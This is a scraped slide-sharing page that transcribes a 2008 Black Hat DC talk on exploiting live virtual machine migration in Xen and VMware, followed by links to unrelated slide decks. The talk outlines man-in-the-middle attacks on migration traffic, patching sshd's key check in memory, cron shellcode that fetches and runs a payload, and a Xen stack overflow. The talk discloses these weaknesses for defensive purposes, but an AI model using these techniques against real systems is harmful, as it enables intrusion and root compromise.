exploiting live virtual machine migration
play

Exploiting Live Virtual Machine Migration Jon Oberheide University - PowerPoint PPT Presentation

Jul 17, 2023 •122 likes •441 views

Exploiting Live Virtual Machine Migration Jon Oberheide University of Michigan February 21, 2008 Black Hat DC - Game Plan Introduction to VM migration Live migration security Exploiting live migration Future attacks and

  1. Exploiting Live Virtual Machine Migration Jon Oberheide University of Michigan February 21, 2008 Black Hat DC -

  2. Game Plan • Introduction to VM migration • Live migration security • Exploiting live migration • Future attacks and wrap-up Slide #2 Exploiting Live Virtual Machine Migration – Black Hat DC 2008

  3. Live VM Migration • Transfer of a VM from one physical machine to another with little or no service downtime High Availability Enhanced Mobility Dynamic Load Balancing Slide #3 Exploiting Live Virtual Machine Migration – Black Hat DC 2008

  4. Live Migration Methodology • Minimize service downtime • Minimize migration duration • Migration Types: • Stop-and-copy (S-C) • Demand-migration (D-M) • Iterative precopy (I-P) I-P D-M S-C High Downtime Hybrid Low Downtime Low Duration High Duration Slide #4 Exploiting Live Virtual Machine Migration – Black Hat DC 2008

  5. Stop and Copy • Stop source VM • Copy all pages over the network • Start destination VM Stop and Copy Longest Service Downtime Shortest Migration Duration Slide #5 Exploiting Live Virtual Machine Migration – Black Hat DC 2008

  6. Demand Migration • Copy over critical OS structures • Start destination VM • Page faults trigger network copy Demand Migration Shortest Service Downtime Longest Migration Duration Slide #6 Exploiting Live Virtual Machine Migration – Black Hat DC 2008

  7. Iterative Precopy • Iteratively copy pages over network • Keep copying dirtied pages until threshold • At threshold, stop source VM, copy remaining pages, start destination VM Iterative Precopy Balances Service Downtime and Migration Duration • Method used by VMware/Xen Slide #7 Exploiting Live Virtual Machine Migration – Black Hat DC 2008

  8. Game Plan • Introduction to VM migration • Live migration security • Exploiting live migration • Future attacks and wrap-up Slide #8 Exploiting Live Virtual Machine Migration – Black Hat DC 2008

  9. A Trip Down Memory Lane • Physical machines • Machine state protected by MMU/hardware • Physical attacks (firewire device DMA) • Virtual Machines • VM state protected by VMM/hypervisor • Software attacks (weak VMM isolation) Can we break any more isolation boundaries? Slide #9 Exploiting Live Virtual Machine Migration – Black Hat DC 2008

  10. A Trip Down Memory Lane Of course! Functionality always usurps security! • Migration-enabled VMs • Full VM state exposed to network • Trades off security for management capabilities • Authentication, confidentiality, isolation concerns Slide #10 Exploiting Live Virtual Machine Migration – Black Hat DC 2008

  11. VM Migration Security • Migration data plane • Network transit path over which migration occurs • Security of data plane • Unauthenticated, insecure migration data plane • Full access granted to VM state • OS/kernel memory • Application state • Sensitive data, passwords, keys, etc • VMware and Xen migrations vulnerable Slide #11 Exploiting Live Virtual Machine Migration – Black Hat DC 2008

  12. Breaching the Data Plane • Breach of data plane means game over • Entire virtual machine may be compromised • Kernel, userspace applications, data • Requirement for breach • Manipulate traffic along migration path between source and destination VMM • Need to perform MITM attack • ARP/DHCP spoofing • DNS spoofing/poisoning • IP/route hijacking Slide #12 Exploiting Live Virtual Machine Migration – Black Hat DC 2008

  13. Breaching the Data Plane • Passive Attacks • Snarf sensitive data, passwords, keys in memory • Active Attacks • Manipulate authentication services • sshd, /bin/login, pam, etc • Manipulate kernel structures • slip rootkits into memory Slide #13 Exploiting Live Virtual Machine Migration – Black Hat DC 2008

  14. Game Plan • Introduction to VM migration • Live migration security • Exploiting live migration • Future attacks and wrap-up Slide #14 Exploiting Live Virtual Machine Migration – Black Hat DC 2008

  15. Exploiting VM Migration • Xensploit • Non-weapons-grade proof-of-concept tool • Works against Xen and VMware migrations • Attack classes • VM application/userland exploits • OS/kernel exploits • VMM subversion Slide #15 Exploiting Live Virtual Machine Migration – Black Hat DC 2008

  16. VM Application Exploits • sshd authentication bypass • Identify pubkey authentication routines • Manipulate to allow unrestricted root access • Access wide-open after migration completes • Cron daemon shellcode injection • Privileged, inconspicuous daemon • Inject HTTP GET + execve shellcode • Payload fetch/exec on next find_jobs invocation Slide #16 Exploiting Live Virtual Machine Migration – Black Hat DC 2008

  17. Exploitation Example sshd authentication bypass • Before migration: • attacker denied access to VM • During migration • Xensploit manipulates the in-memory object code of sshd as it crosses the wire • After migration • attacker achieves unrestricted root access to VM Slide #17 Exploiting Live Virtual Machine Migration – Black Hat DC 2008

  18. Before Migration • Attacker attempts to gain root access to the target virtual machine via ssh • Attacker is denied access to the VM Slide #18 Exploiting Live Virtual Machine Migration – Black Hat DC 2008

  19. sshd Authentication Code • Source code from OpenSSH's auth2-pubkey.c: Slide #19 Exploiting Live Virtual Machine Migration – Black Hat DC 2008

  20. During Migration • Xensploit manipulates the object code of sshd's authentication routines as it crosses the wire • Xensploit injects a mov $0x1,%eax instruction into user_key_allowed2, returning 1 (true) Slide #20 Exploiting Live Virtual Machine Migration – Black Hat DC 2008

  21. After Migration • Attacker again attempts to gain root access via ssh on the target virtual machine • No authentication is necessary as sshd's routines have been manipulated by Xensploit • Root access is granted to the attacker Slide #21 Exploiting Live Virtual Machine Migration – Black Hat DC 2008

  22. VM Kernel Exploits • Kernel manipulation • Direct access to in-memory kernel image • More complexity but more power • Leverage all your DMA attack payloads • Stealthy backdoor drop • network/syscall/ioctl trigger • Full-blown VMBR hoisting Slide #22 Exploiting Live Virtual Machine Migration – Black Hat DC 2008

  23. VMBR Hoisting • Virtual Machine-Based Rootkits • Slip in extra virt layer a la SubVirt/Blue Pill/Vitriol Slide #23 Exploiting Live Virtual Machine Migration – Black Hat DC 2008

  24. Subverting the VMM • Mangle migration payload • Exploit a vulnerability and subvert VMM • Leverage Xen dom0 vulns • Present in Xen daemon migration routines • <= 3.1.0 release vulnerable • Undoubtedly more... • Instantly own all hosted VMs • And all future migrated VMs! Slide #24 Exploiting Live Virtual Machine Migration – Black Hat DC 2008

  25. Subverting the VMM • Xen's libxc/xc_domain_restore.c: • No check for signed integer j < 0 • Stack overflow of region_pfn_type in Xen VMM Slide #25 Exploiting Live Virtual Machine Migration – Black Hat DC 2008

  26. Game Plan • Introduction to VM migration • Live migration security • Exploiting live migration • Future attacks and wrap-up Slide #26 Exploiting Live Virtual Machine Migration – Black Hat DC 2008

  27. Additional Attacks Lots more juice in the migration orange! • Fraudulent migration requests • Owned VMMs snarfing up VMs • False resource advertising • Migration-enabled load balancing • Future attacks inevitable • Increased functionality • Increased complexity • Increased security risk Slide #27 Exploiting Live Virtual Machine Migration – Black Hat DC 2008

  28. Just Encrypt It, Stupid! • Encryption goes a long way! • Fingerprinting migrations • Reconnaissance / targeting • Enabled by iterative-precopy method • Similar to VBR attacks • Increased complexity • Full PKI adds considerable deployment complexity • Not currently implemented! Slide #28 Exploiting Live Virtual Machine Migration – Black Hat DC 2008

  29. Vendor Response • VMware • Use separate network for migration paths • Use hardware-based crypto cards • VMotion/Virtual Infrastructure 3 vulnerable • XenSource • Consult vendor/distribution for security fixes • Latest open-source release still at risk • Unsure of migration status in XenServer4 • Microsoft Hyper-V • Will they get it right? Slide #29 Exploiting Live Virtual Machine Migration – Black Hat DC 2008

  30. The Big Picture • VM migration paradigm • VERY useful functionality • Awareness of security risk necessary • Better isolation, access control, authentication • Until then... • Severe weaknesses exist in extensively deployed systems • Valuable weapon for pentester/attacker Slide #30 Exploiting Live Virtual Machine Migration – Black Hat DC 2008

  31. Questions? QUESTIONS? • Contact info: • Jon Oberheide <jonojono@umich.edu> • PhD student, University of Michigan • Advisor: Farnam Jahanian • Research Group: http://www.eecs.umich.edu/fjgroup/ Slide #31 Exploiting Live Virtual Machine Migration – Black Hat DC 2008

Recommend

Virtual Machine Migration Pierre Riteau University of Rennes 1, IRISA Inria Rennes - Bretagne

Virtual Machine Migration Pierre Riteau University of Rennes 1, IRISA Inria Rennes - Bretagne

Hardware Virtualization Migration Live Migration Techniques Live Migration in WANs Live Migration Optimizations Conclusion Virtual Machine Migration Pierre Riteau University of Rennes 1, IRISA Inria Rennes - Bretagne Atlantique October 21,

585 views • 42 slides
Power Consumption of Virtual Machine Live Migration in Clouds Anusha Karur Manar Alqarni

Power Consumption of Virtual Machine Live Migration in Clouds Anusha Karur Manar Alqarni

Power Consumption of Virtual Machine Live Migration in Clouds Anusha Karur Manar Alqarni Muhannad Alghamdi Content Introduction Contribution Related Work Background Experiment &amp; Result Conclusion Future Work

750 views • 30 slides
On Selecting the Right Optimizations for Virtual Machine Migration Senthil Nathan N , Umesh

On Selecting the Right Optimizations for Virtual Machine Migration Senthil Nathan N , Umesh

On Selecting the Right Optimizations for Virtual Machine Migration Senthil Nathan N , Umesh Bellur, Purushottam Kulkarni Systems and Networks Group (SynerG) Department of Computer Science and Engineering Indian Institute of Technology Bombay

682 views • 27 slides
CloudNet : Dynamic Pooling of Cloud Resources by Live WAN Migration of Virtual Machines Timothy

CloudNet : Dynamic Pooling of Cloud Resources by Live WAN Migration of Virtual Machines Timothy

CloudNet : Dynamic Pooling of Cloud Resources by Live WAN Migration of Virtual Machines Timothy Wood , Prashant Shenoy University of Massachusetts Amherst K.K. Ramakrishnan, and Jacobus Van der Merwe AT&amp;T Labs - Research VEE 2011

1.17k views • 24 slides
Multi-Agent Negotiation of Virtual Machine Migration Using the Lightweight Coordination Calculus

Multi-Agent Negotiation of Virtual Machine Migration Using the Lightweight Coordination Calculus

KES AMSTA 2012 Multi-Agent Negotiation of Virtual Machine Migration Using the Lightweight Coordination Calculus Paul Anderson &lt;dcspaul@ed.ac.uk&gt; Shahriar Bijani &lt;S.Bijani@sms.ed.ac.uk&gt; Alexandros Vichos Friday, 22 June 2012

388 views • 17 slides
Joint Virtual Machine Placement and Migration in Dynamic Policy-Driven Data Centers Hugo Flores

Joint Virtual Machine Placement and Migration in Dynamic Policy-Driven Data Centers Hugo Flores

Joint Virtual Machine Placement and Migration in Dynamic Policy-Driven Data Centers Hugo Flores J Lucas California State University Dominguez Hills Department of Computer Science 1 Presentation Overview 1. Introduction 2. Related Works

853 views • 48 slides
Virtual Machines What is a Virtual Machine? Java Virtual Machine (Application Virtualization)

Virtual Machines What is a Virtual Machine? Java Virtual Machine (Application Virtualization)

Virtual Machines What is a Virtual Machine? Java Virtual Machine (Application Virtualization) Software to simulate hardware Independent Separate Use one piece of hardware to simulate many computers Topics What are

519 views • 22 slides
KVM Live Migration Optimization Li, Liang Zhang, Yang Aug 2015 1 Agenda Background

KVM Live Migration Optimization Li, Liang Zhang, Yang Aug 2015 1 Agenda Background

KVM Live Migration Optimization Li, Liang Zhang, Yang Aug 2015 1 Agenda Background Problems Solutions Performance Work in progress 2 Background Live migration usage in cloud computing facilitate maintenance

461 views • 18 slides
Machine Placement and Migration in Cloud Datacenters Authors: Liuhua Chen, Haiying Shen and

Machine Placement and Migration in Cloud Datacenters Authors: Liuhua Chen, Haiying Shen and

Cache Contention Aware Virtual Machine Placement and Migration in Cloud Datacenters Authors: Liuhua Chen, Haiying Shen and Stephen Platt Presenter: Haiying Shen IEEE ICNP November 8-11, 2016 Singapore 2 Objective An effective VM allocation

411 views • 20 slides
An Online Virtual Machine Placement Algorithm in an Over-Committed Cloud Siqi Ji*, Ming Da Li,

An Online Virtual Machine Placement Algorithm in an Over-Committed Cloud Siqi Ji*, Ming Da Li,

IC2E18 An Online Virtual Machine Placement Algorithm in an Over-Committed Cloud Siqi Ji*, Ming Da Li, Niannian Ji, Baochun Li Virtual Machine Placement Select the most suitable physical machine (PM) to host each virtual machine (VM).

417 views • 13 slides
Virtual Machines Uses for Virtual Machines There are several uses for virtual machines:

Virtual Machines Uses for Virtual Machines There are several uses for virtual machines:

Virtual Machines Uses for Virtual Machines There are several uses for virtual machines: Virtual machine technology, often just called virtualization , makes one computer behave as several Running several operating systems simultaneously on

254 views • 10 slides
L2L L2L Live Live to e to e-Lea Learning rning Bridging physical and virtual classrooms

L2L L2L Live Live to e to e-Lea Learning rning Bridging physical and virtual classrooms

L2L L2L Live Live to e to e-Lea Learning rning Bridging physical and virtual classrooms using an integrated lecture capture and delivery service Matteo Bertazzo - CINECA InterUniversity Consortium 3 rd TF-Media Task Force meeting,

521 views • 21 slides
CSCI 2270: Advanced Topics in Database Management Zephyr : Live Migration In Shared Nothing

CSCI 2270: Advanced Topics in Database Management Zephyr : Live Migration In Shared Nothing

CSCI 2270: Advanced Topics in Database Management Zephyr : Live Migration In Shared Nothing Databases For Elastic Cloud Platforms &quot;Cut Me Some Slack&quot; : Latency-Aware Live Migration For Databases Yang Zou yang@cs.brown.edu 1

279 views • 16 slides
Transparent migration of virtual Transparent migration of virtual infrastructures in large

Transparent migration of virtual Transparent migration of virtual infrastructures in large

Transparent migration of virtual Transparent migration of virtual infrastructures in large datacenters for infrastructures in large datacenters for Cloud Computing Cloud Computing Workshop on Management of Cloud Systems ( Workshop on

489 views • 23 slides
Container Live Migration Adrian Reber FOSDEM 2020, February 01 Red Hat Blog: Container

Container Live Migration Adrian Reber FOSDEM 2020, February 01 Red Hat Blog: Container

Container Live Migration Adrian Reber FOSDEM 2020, February 01 Red Hat Blog: Container migration with Podman on RHEL https://www.redhat.com/en/blog/container-migration-podman-rhel 2 FOSDEM 2020 Definition: Container Live Migration 3

789 views • 47 slides
Migration Matters Policy Toolkit Katy MacMillan ODS Consulting We are live! } New toolkit on

Migration Matters Policy Toolkit Katy MacMillan ODS Consulting We are live! } New toolkit on

Migration Matters Policy Toolkit Katy MacMillan ODS Consulting We are live! } New toolkit on migration available at: } www.migrationscotland.org.uk } Leaflets with direct web address Today } Celebrate the launch of the toolkit }

339 views • 12 slides
The Java Virtual Machine The Java Virtual Machine interpret compile Native Binary Code Michael

The Java Virtual Machine The Java Virtual Machine interpret compile Native Binary Code Michael

Virtual Machines in Compilation Virtual Machines in Compilation Abstract Syntax Tree compile Compilation 2007 Compilation 2007 Virtual Machine Code The Java Virtual Machine The Java Virtual Machine interpret compile Native Binary Code

541 views • 11 slides
A Tor gatewayed platform for everyday use Using a virtual machine stack with its own virtual

A Tor gatewayed platform for everyday use Using a virtual machine stack with its own virtual

http://infinite.barrel-of-knowledge.info/cryptoparty/ (Surface web) https://yhfitd2wvrz3aybh.onion/cryptoparty/ (Deep web) A Tor gatewayed platform for everyday use Using a virtual machine stack with its own virtual LAN with all traffic

629 views • 9 slides
ALMA - GC-assisted JVM Live Migration for Java Server Applications Rodrigo Bruno, Paulo Ferreira

ALMA - GC-assisted JVM Live Migration for Java Server Applications Rodrigo Bruno, Paulo Ferreira

ALMA - GC-assisted JVM Live Migration for Java Server Applications Rodrigo Bruno, Paulo Ferreira {rodrigo.bruno,paulo.ferreira}@inesc-id.pt INESC-ID - Instituto Superior Tcnico, ULisboa Middleware16@Trento JVM Live Migration (real

526 views • 35 slides
Virtual Machines Virtual Machines What is a virtual machine? Examples? Benefits?

Virtual Machines Virtual Machines What is a virtual machine? Examples? Benefits?

Virtual Machines Virtual Machines What is a virtual machine? Examples? Benefits? Virtualization Creation of an isomorphism that maps a virtual guest system to a real host: Maps guest state S to host state V(S) For any

271 views • 26 slides
MIPS Virtual what is the Java - what is the JVM ? lecture 25 Machine analogy ? - what is

MIPS Virtual what is the Java - what is the JVM ? lecture 25 Machine analogy ? - what is

MIPS Virtual what is the Java - what is the JVM ? lecture 25 Machine analogy ? - what is Java &quot;byte code&quot; Java Virtual Machine invoked methods and local stack (is it related to MIPS assembly/machine code ?) variables ?

487 views • 4 slides
Exploiting Sequence of Events for Potential Attack Detection in Network Security using Machine

Exploiting Sequence of Events for Potential Attack Detection in Network Security using Machine

Exploiting Sequence of Events for Potential Attack Detection in Network Security using Machine Learning Ashrith Barthur, PhD Security Research @cyberbaggage H 2 O .ai Machine Intelligence Sequence of Events (SoE) What is a Sequence of

636 views • 35 slides
Exploiting Level- Exploiting Level -of of- -Detail Perception Detail Perception Multiple

Exploiting Level- Exploiting Level -of of- -Detail Perception Detail Perception Multiple

Special Course on Networked Virtual February 26, 2004 Environments Exploiting Level- Exploiting Level -of of- -Detail Perception Detail Perception Multiple Multiple- -Channel Architecture Channel Architecture Nearby viewers Nearby

165 views • 5 slides
Live Migration @Alibaba Cloud: issues settled &amp; challenges remain Chao Zhang Email:

Live Migration @Alibaba Cloud: issues settled &amp; challenges remain Chao Zhang Email:

1111 Live Migration @Alibaba Cloud: issues settled &amp; challenges remain Chao Zhang Email: zhuoxi.zc@alibaba-inc.com 1111 1 2 4 3 Challenges of Live LM Application@ Performance Tuning Future challenges Alibaba Cloud Migration

313 views • 19 slides

More recommend